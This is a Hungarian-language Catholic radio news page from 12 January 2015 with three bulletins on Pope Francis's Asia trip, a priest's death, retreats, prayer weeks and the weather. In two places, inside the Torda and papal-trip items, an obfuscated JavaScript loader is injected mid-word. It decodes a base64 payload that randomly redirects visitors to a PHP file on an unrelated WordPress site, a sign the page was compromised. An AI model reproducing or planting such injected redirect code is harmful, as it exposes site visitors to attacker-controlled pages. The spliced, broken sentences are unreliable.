2015. január 12. – Hírek és programajánló

H Í R E K   E S T E

Ferenc pápa ma este másodszor is útra kel Kelet felé
A pápa hetedik külföldi apostoli látogatása során, január 13. és 15. között Srí Lanka szigetén tartózkodik. Szerdán a fővárosban, Colombóban szentté avatja Joseph Vaz papot. Ferenc pápa az első katolikus egyházfő, aki ellátogat egy tamil szentélybe.
Az ázsiai út második állomása január 15. és 19. között a Fülöp-szigetek lesz. Ferenc pápa érkezése miatt Manila kormánya és az ország déli részének függetlenségéért negyven éve harcoló muzulmán harcosok között december 18-án az eddigi leghosszabb tűzszünet lépett életbe, amely a pápai látogatás utolsó napján ér véget.
A Szentatya ázsiai látogatásának témája a vallásközi párbeszéd, a szegénység, a kivándorlás problémája, valamint a természetvédelem és az éghajlatváltozás lesz. – adta hírül az MTI nyomán az erdély.ma portál. 

Lelkinapot tartottak a Keresztény Élet Közösségéhez tartozó csoportok
A közösség prófétai hivatása volt a témája annak a lelkinapnak, amelyet január 10-én tartottak Szatmárnémetiben. A résztvevők beszélgettek a Keresztény Élet Közösség történetéről, jellemvonásairól, majd közösen elgondolkodtak a Szentírásban megjelenő prófétai hivatáson. Adolfo Nicolas jezsuita generális szavait emelték ki, miszerint a próféta szembe mer nézni a kihívásokkal és szentignáci stílusban válaszol ezekre.

Elhunyt Oláh Domokos esperes, plébános
Oláh Domokos esperes, plébános életének 76., papságának 51. évében, január 11-én halt meg. 
A lelke üdvéért végzett szentmise és temetési szertartás január 12-én, kedden 11 órakor lesz, a székelyudvarhelyi Szent Miklós Plébániatemplomban. Végakarata szerint, a székelyudvarhelyi római katolikus temetőben helyezik örök nyugalomra. 
Oláh Domokos plébános Altorján született 1939. június 20-án. Teológiai tanulmányait a gyulafehérvári Hittudományi Főiskolán végezte. 1964. április 10-én Márton Áron szentelte pappá. Segédlelkészként Gelencén, plébánosként Szentivánlaborfalván és Szovátán szolgált. Az örök világosság, amelyet másoknak is olyan lelkesen hirdetett, fényeskedjék neki!

Esztergomban találkoznak a Hittani Kongregáció európai munkatársai
Január 13-15. között tartják a Hittani Kongregáció vezetőinek és az európai püspöki konferenciák hittani bizottságai elnökeinek találkozóját. A Hittani Kongregáció vezetői különböző kontinensekre utaznak, kiemelve ezáltal a helyi intézmények fontosságát és felelősségét a hittani kérdésekre vonatkozóan. A nemzetközi konferencián részt vesz Jakubinyi György gyulafehérvári érsek is, a romániai katolikus püspöki kar képviseletében.

A vallásszabadság napja Tordán
A Magyar Unitárius Egyház január 13-án, kedden, a vallásszabadság napján ünnepséget szervez. A megemlékezés holnap délelőtt fél tizenegy órakor istentisztelettel kezdődik Tordán. Az unitárius templomban tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó ünnepi istentiszteleten a szószéki szolgálatot Nagy László, a marosvásárhelyi Bolyai-téri Egyházközség lelkésze tartja. Ezt követően kerül sor Körösfői-Kriesch Aladár Tordai országgyűlés című festményének megtekintésére a tordai múzeumban. 
Este hat órától Kolozsváron, a belvárosi unitárius templomban ünnepi istentisztelettel folytatódik a megemlékezés, a szószéki szolgálatot Gyerő Dávid főjegyző, kolozsi lelkész tartja.

Lelkigyakorlatos továbbképző kántoroknak
Kántorok számára lelkigyakorlatos továbbképzőt tartanak február 3-6 között Gyulafehérváron, a Gróf Majláth Gusztáv Károly Római Katolikus Teológiai Líceumban. A továbbképző február 3-án délután három órakor Veni Sancteval kezdődik. A továbbképző moderátora Ilyés Zsolt csíkszentléleki plébános. Részvételi díj 220 lej. A részvételhez előzetes bejelentkezés szükséges január 28-áig a 0258-819.869-es telefonszámon.

Szentségi házasságra készülők figyelmébe
A székelyudvarhelyi Kis Szent Teréz és a Szent György Egyházközség idén is együtt szervezi meg a jegyeskurzust. Kérik azokat a keresztény jegyespárokat, akik 2015 folyamán szándékoznak szentségi házasságot kötni, jelezzék szándékukat személyesen a plébániahivatalokban. A jegyeskurzus február 9-én kezdődik.
A Szent Gellért Alapítvány januárban két hétvégén, 16-18. és 23-25. között jegyeskurzusokat tart a kápolnási és szentegyházasfalvi plébániákon. Az érdeklődő párok választhatják egyik vagy másik időpontot. A program egy hétvégés: pénteken este hat órakor kezdődik, vasárnap szentmisével fejeződik be. A kurzus célja az együttjáró, házasságra készülő vagy már házasságot kötött párok kapcsolatának mélyítése. Jelentkezni a 0740-799.581-es telefonszámon lehet.

Az időjárásról: 
Holnap nem várható számottevő csapadék, csak kevés felhő lesz az égen. A hajnali órákban helyenként pára, köd képződhet. Az erős, viharos nyugati, északnyugati szél is mérséklődik. Éjszaka és hajnalban ismét nagyon hűvös lesz, a hegyvidéken akár -15°C. Napközben felmelegszik a levegő, 5-8°C várható. 

MRE - Hírszolgálat, 2015. január 12.


H Í R E K   D É L B E N

Ferenc pápa ma este másodszor is útra kel Kelet felé
Federico Lombardi szentszéki szóvivő elmondta, hogy a pápa hetedik külföldi apostoli látogatása során, január 13. és 15. között Srí Lanka szigetén tartózkodik. Szerdán a fővárosban, Colombóban szentté avatja a katolicizmust Srí Lankán elterjesztő Joseph Vaz papot, aki lefordította szingaléz és tamil nyelvre az evangéliumot. Ferenc pápa lesz az első katolikus egyházfő, aki ellátogat egy tamil szentélybe.
Az ázsiai út második állomása január 15. és 19. között a Fülöp-szigetek lesz. Ferenc pápa érkezése miatt Manila kormánya és az ország déli részének függetlenségéért negyven éve harcoló muzulmán harcosok között december 18-án az eddigi leghosszabb tűzszünet lépett életbe, amely a pápai látogatás utolsó napján ér véget.
Január 17-én a Szentatya a 2013-as Jolfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');anda tájfun pusztította vidékre látogat, ahol a természeti katasztrófa túlélőivel találkozik. Január 18-án Ferenc pápa Manilában mutat be szentmisét a Santo Nino (Szent Gyermek), a Fülöp-szigetek legjelentősebb egyházi ünnepén, ide négymilliós tömeget várnak.
Ferenc pápa ázsiai látogatásának témája a vallásközi párbeszéd, a szegénység, a kivándorlás problémája, valamint a természetvédelem és az éghajlatváltozás lesz. – adta hírül az MTI nyomán az erdély.ma portál.

Elhunyt Oláh Domokos esperes, plébános
Oláh Domokos esperes, plébános életének 76., papságának 51. évében, január 11-én halt meg.
A lelke üdvéért végzett szentmise és temetési szertartás január 12-én, kedden 11 órakor lesz, a székelyudvarhelyi Szent Miklós Plébániatemplomban. Végakarata szerint, a székelyudvarhelyi római katolikus temetőben helyezik örök nyugalomra.
Oláh Domokos plébános Altorján született 1939. június 20-án. 1964. április 10-én szentelték pappá. Segédlelkészként Gelencén, plébánosként Szentivánlaborfalván és Szovátán szolgált.
Az örök világosság, amelyet másoknak is olyan lelkesen hirdetett, fényeskedjék neki!

Esztergomban találkoznak a Hittani Kongregáció európai munkatársai
Január 13-15. között tartják a Hittani Kongregáció vezetőinek és az európai püspöki konferenciák hittani bizottságai elnökeinek találkozóját. A Hittani Kongregáció vezetői különböző kontinensekre utaznak, kiemelve ezáltal a helyi intézmények fontosságát és felelősségét a hittani kérdésekre vonatkozóan. A nemzetközi konferencián részt vesz Jakubinyi György gyulafehérvári érsek is, a romániai katolikus püspöki kar képviseletében.

Imanyolcad az egységért Székelyudvarhelyen
A székelyudvarhelyi Bethlen lakótelepi katolikus, református és unitárius gyülekezetek második alkalommal tartanak a Krisztus-hívők egységéért közös imahetet. Tegnap mindhárom felekezet saját templomában hangolódott rá az „Adj innom!” mottójú imaalkalmakra. Ezen a héten, minden este hat órakor kezdődnek a felekezetközi istentiszteletek: ma este a református templomban Rüsz Domokos unitárius lelkész, holnap Botár Gábor római katolikus plébános az unitárius templomban szolgál.

Szentignáci lelkidélután Kálmándon
Január 14-én, szerdán délután öt órától, a kálmándi Német Fórum házában az Istenre hagyatkozás témakörében, „Tedd kezedet Isten kezébe” mottóval lelkidélutánt tart a Szatmári Püspökség világiak irodája. A szentignáci jellegű program az Istenre való hagyatkozást igyekszik majd résztvevőiben erősíteni. Az év elején megpróbálják tudatosítani, hogy a legnagyobb biztonság az, ha Isten vezetésére bízzák magukat, és életüket megpróbálják úgy berendezni, hogy Isten legyen a középpontban.

Várunk rád
A csíkszentdomokosi Segítő Nővérek és önkéntesek szervezésében vidám, táncos, játékos együttlétre hívnak minden 28-60 év közti egyedülálló férfit és nőt január 17-én, szombaton, a marosfői Ezüstfenyő szállodába. Érdeklődni és jelentkezni a 0743-630.317 vagy a 0741-624.452-es telefonszámokon lehet.

Feleségek és édesanyák lelkigyakorlata
Január 23-25. között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban 25 és 50 év közötti feleségek és édesanyák számára tartanak lelkigyakorlatot Ilyés Erika segítőnővér vezetésével. A feleségek, édesanyák lelkigyakorlatára január 20-ig lehet jelentkezni a hazpio@gmail.com e-mailcímen vagy a 0755-489.743-as telefonszámon.

Az időjárásról:
Többnyire felhős égbolt jellemző, havazás, jeges eső várható, a szélmozgás mérsékelt, a légköri nyomás emelkedőfélben van.

MRE - Hírszolgálat, 2015. január 12.


H Í R E K   R E G G E L

Gyermekeket keresztelt meg Ferenc pápa
A Szentatya, tegnap, Jézus megkeresztelésének ünnepén harminchárom csecsemőt, húsz kislányt, közöttük egy ikerpárt és tizenhárom kisfiút, részesített a keresztség szentségében a Sixtus-kápolnában. A gyereksírástól kísért szentbeszédében Ferenc pápa elmondta, hogy a gyerekek vallásos nevelése a szülők példamutatásától függ. Imádkozott azokért az édesanyákért, akik nem tudnak táplálékot biztosítani gyermekeiknek. A Szent Péter téren délben mondott beszédében arra kérte a híveket, hogy ne csak születésük, hanem megkeresztelésük napjára is emlékezzenek.

Esztergomban találkoznak a Hittani Kongregáció európai munkatársai
Január 13-15. között tartják a Hittani Kongregáció vezetőinek és az európai püspöki konferenciák hittani bizottságai elnökeinek találkozóját. A Hittani Kongregáció vezetői különböző kontinensekre utaznak, kiemelve ezáltal a helyi intézmények fontosságát és felelősségét a hittani kérdésekre vonatkozóan. A nemzetközi konferencián részt vesz Jakubinyi György gyulafehérvári érsek is, a romániai katolikus püspöki kar képviseletében.

Imanyolcad az egységért Székelyudvarhelyen
A székelyudvarhelyi Bethlen lakótelepi katolikus, református és unitárius gyülekezetek második alkalommal tartanak a Krisztus-hívők egységéért közös imahetet. Tegnap mindhárom felekezet saját templomában hangolódott rá az „Adj innom!” mottójú imaalkalmakra. Ezen a héten, minden este hat órakor kezdődnek a felekezetközi istentiszteletek: ma este a református templomban Rüsz Domokos unitárius lelkész, holnap Botár Gábor római katolikus plébános az unitárius templomban szolgál.

Szentignáci lelkidélután Kálmándon
Január 14-én, szerdán délután öt órától, a kálmándi Német Fórum házában az Istenre hagyatkozás témakörében, „Tedd kezedet Isten kezébe” mottóval lelkidélutánt tart a Szatmári Püspökség világiak irodája. A szentignáci jellegű program az Istenre való hagyatkozást igyekszik majd résztvevőiben erősíteni. Az év elején megpróbálják tudatosítani, hogy a legnagyobb biztonság az, ha Isten vezetésére bízzák magukat, és életüket megpróbálják úgy berendezni, hogy benne Isten legyen a középpontban. Szeretettel várnak minden érdeklődőt.

Várunk rád
A csíkszentdomokosi Segítő Nővérek és önkéntesek szervezésében vidám, táncos, játékos együttlétre hívnak minden 28-60 év közti egyedülálló férfit és nőt január 17-én, szombaton, a marosfői Ezüstfenyő szállodába. Érdeklődni és jelentkezni a 0743-630.317 vagy a 0741-624.452-es telefonszámokon lehet.

Feleségek és édesanyák lelkigyakorlata
Január 23-25. között a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban 25 és 50 év közötti feleségek és édesanyák számára tartanak lelkigyakorlatot Ilyés Erika segítőnővér vezetésével. A feleségek, édesanyák lelkigyakorlatára január 20-ig lehet jelentkezni a hazpio@gmail.com e-mailcímen vagy a 0755-489.743-as telefonszámon.

Szentségi házasságra készülők figyelmébe
A székelyudvarhelyi Kis Szent Teréz és a Szent György Egyházközség idén is együtt szervezi meg a jegyeskurzust. Kérik azokat a keresztény jegyespárokat, akik 2015 folyamán szándékoznak szentségi házasságot kötni, jelezzék szándékukat személyesen a plébániahivatalokban. A jegyeskurzus február 9-én kezdődik.

Az időjárásról:
Többnyire felhős égbolt jellemző, havazás, jeges eső várható, a szélmozgás mérsékelt, a légköri nyomás emelkedőfélben van. A reggeli minimumok -4 ºC -1 ºC körül alakulnak.

MRE - Hírszolgálat, 2015. január 12.

About the author

maradmin

Leave a Comment